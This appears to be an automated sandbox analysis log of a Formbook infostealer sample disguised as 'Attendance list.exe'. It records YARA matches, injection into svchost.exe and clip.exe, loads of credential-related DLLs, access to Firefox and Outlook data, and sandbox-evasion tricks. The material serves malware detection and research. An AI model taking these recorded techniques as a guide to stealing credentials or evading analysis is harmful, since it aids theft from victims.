            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4463038232.00000000042F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4461289694.0000000002640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2180673228.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4462982503.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2180342193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4463119733.0000000004980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2181155888.0000000005A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@14/12
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092A2D5 GetLastError,FormatMessageW,0_2_0092A2D5
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00918713 AdjustTokenPrivileges,CloseHandle,0_2_00918713
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00918CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00918CC3
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0092B59E
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0093F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0093F121
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009386D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_009386D0
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008C4FE9
            Source: C:\Users\user\Desktop\Attendance list.exeFile created: C:\Users\user\AppData\Local\Temp\aut6F8D.tmpJump to behavior
            Source: Attendance list.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000004.00000003.2361724163.00000000027ED000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.000000000280F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2359928235.00000000027E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Attendance list.exeReversingLabs: Detection: 50%
            Source: Attendance list.exeVirustotal: Detection: 39%
            Source: unknownProcess created: C:\Users\user\Desktop\Attendance list.exe "C:\Users\user\Desktop\Attendance list.exe"
            Source: C:\Users\user\Desktop\Attendance list.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Attendance list.exe"
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Attendance list.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Attendance list.exe"Jump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Attendance list.exeStatic file information: File size 1193472 > 1048576
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Attendance list.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000000.2093430557.000000000012E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: Attendance list.exe, 00000000.00000003.1995113050.0000000003620000.00000004.00001000.00020000.00000000.sdmp, Attendance list.exe, 00000000.00000003.1993378375.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2081581870.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080172429.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.000000000379E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2183326669.0000000004463000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2180679254.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.00000000047AE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.0000000004610000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Attendance list.exe, 00000000.00000003.1995113050.0000000003620000.00000004.00001000.00020000.00000000.sdmp, Attendance list.exe, 00000000.00000003.1993378375.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2081581870.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080172429.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180709353.000000000379E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000004.00000003.2183326669.0000000004463000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2180679254.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.00000000047AE000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4463310775.0000000004610000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.2139386634.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180501051.0000000003000000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005BDC000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DB2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sSzWYtHqcRqHklFYcPzKpLlSXP.exe, 00000003.00000002.4468854807.0000000005BDC000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000004.00000002.4461785541.0000000002766000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4464333881.0000000004C3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2467474395.000000001DB2C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.2139386634.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2180501051.0000000003000000.00000004.00000020.00020000.00000000.sdmp
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Attendance list.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0093C304 LoadLibraryA,GetProcAddress,0_2_0093C304
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E8B85 push ecx; ret 0_2_008E8B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031C0 push eax; ret 2_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004161D3 push ecx; ret 2_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004162CC push ecx; ret 2_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417356 push ebx; retf 2_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416338 push ecx; ret 2_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004083DA push es; ret 2_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040BBEC pushad ; iretd 2_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418577 push 2823B84Bh; retf 2_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417D38 push ecx; iretd 2_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 2_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411E39 push esp; ret 2_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 2_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360225F pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036027FA pushad ; ret 2_2_036027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036309AD push ecx; mov dword ptr [esp], ecx2_2_036309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360283D push eax; iretd 2_2_03602858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360135F push eax; iretd 2_2_03601369
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046127FA pushad ; ret 4_2_046127F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0461225F pushad ; ret 4_2_046127F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0461283D push eax; iretd 4_2_04612858
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_046409AD push ecx; mov dword ptr [esp], ecx4_2_046409B6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_026603DB push ecx; retf 4_2_026603DC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02654193 push ebx; retf 4_2_02654196
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02648A29 pushad ; iretd 4_2_02648A2B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02654B75 push ecx; iretd 4_2_02654B76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02656F40 push edx; retf 4_2_02656F9A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0264EC76 push esp; ret 4_2_0264EC7E
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0265ACE1 push edi; ret 4_2_0265ACE2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_0265AD62 push FFFFFFB8h; retf 4_2_0265AD64
            Source: C:\Windows\SysWOW64\clip.exeCode function: 4_2_02645217 push es; ret 4_2_0264521B
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008C4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008C4A35
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_009455FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_009455FD
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_008E33C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008E33C7
            Source: C:\Users\user\Desktop\Attendance list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\Attendance list.exeAPI/Special instruction interceptor: Address: E83204
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0367096E rdtsc 2_2_0367096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9836Jump to behavior
            Source: C:\Users\user\Desktop\Attendance list.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100928
            Source: C:\Users\user\Desktop\Attendance list.exeAPI coverage: 4.6 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920Thread sleep time: -75000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920Thread sleep time: -46500s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920Thread sleep count: 39 > 30Jump to behavior
            Source: C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe TID: 2920Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 5624Thread sleep count: 136 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 5624Thread sleep time: -272000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 5624Thread sleep count: 9836 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 5624Thread sleep time: -19672000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_00924696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00924696
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0092C9C7
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092C93C FindFirstFileW,FindClose,0_2_0092C93C
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0092F200
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0092F35D
            Source: C:\Users\user\Desktop\Attendance list.exeCode function: 0_2_0092F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0092F65E
